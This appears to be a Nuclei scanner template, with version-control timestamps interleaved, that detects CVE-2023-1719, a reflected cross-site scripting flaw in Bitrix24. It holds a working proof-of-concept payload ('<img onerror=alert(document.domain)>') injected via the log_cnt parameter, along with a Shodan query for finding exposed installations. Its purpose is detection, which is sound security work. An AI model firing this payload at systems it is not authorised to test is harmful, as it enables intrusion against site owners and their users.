2023-11-06 16:45:38 +00:00
id : CVE-2023-1719
info :
2023-11-07 14:39:24 +00:00
name : Bitrix Component - Cross-Site Scripting
2023-11-06 16:45:38 +00:00
author : DhiyaneshDk
2023-11-10 09:15:01 +00:00
severity : critical
2023-11-06 16:45:38 +00:00
description : |
Global variable extraction in bitrix/modules/main/tools.php in Bitrix24 22.0.300 allows unauthenticated remote attackers to (1) enumerate attachments on the server and (2) execute arbitrary JavaScript code in the victim’
reference :
- https://starlabs.sg/advisories/23/23-1719/
- https://nvd.nist.gov/vuln/detail/CVE-2023-1719
2024-03-23 09:28:19 +00:00
- https://github.com/20142995/sectool
2023-11-06 16:45:38 +00:00
classification :
2023-11-10 09:15:01 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score : 9.8
2023-11-06 16:45:38 +00:00
cve-id : CVE-2023-1719
cwe-id : CWE-665
2023-11-10 17:07:52 +00:00
epss-score : 0.02807
2024-03-23 09:28:19 +00:00
epss-percentile : 0.90415
2023-11-10 09:15:01 +00:00
cpe : cpe:2.3:a:bitrix24:bitrix24:22.0.300:*:*:*:*:*:*:*
2023-11-06 16:45:38 +00:00
metadata :
2023-11-07 14:39:24 +00:00
verified : true
2023-11-07 14:54:31 +00:00
max-request : 1
2023-11-06 16:45:38 +00:00
vendor : bitrix24
product : bitrix24
2023-11-07 14:54:31 +00:00
shodan-query : html:"/bitrix/"
2024-01-14 09:21:50 +00:00
tags : cve2023,cve,bitrix,xss,bitrix24
2023-11-06 16:45:38 +00:00
http :
- method : GET
path :
- "{{BaseURL}}/bitrix/components/bitrix/socialnetwork.events_dyn/get_message_2.php?log_cnt=<img%20onerror=alert(document.domain)%20src=1>"
matchers-condition : and
matchers :
- type : word
part : body
words :
- "'LOG_CNT':"
- "<img onerror=alert(document.domain) src=1>"
condition : and
- type : word
part : header
words :
- text/html
- type : status
status :
- 200
2024-03-25 11:57:16 +00:00
# digest: 4a0a00473045022100ee017b54c73c0f61455fa03bda991d45a439666dd9865e87ae61054c61089562022036a61ac1c74ee4bdc735c1e9d6eedb6e2c5cb5f2df88ed4c4e65875d66e4f091:922c64590222798bb761d5b6d8e72950
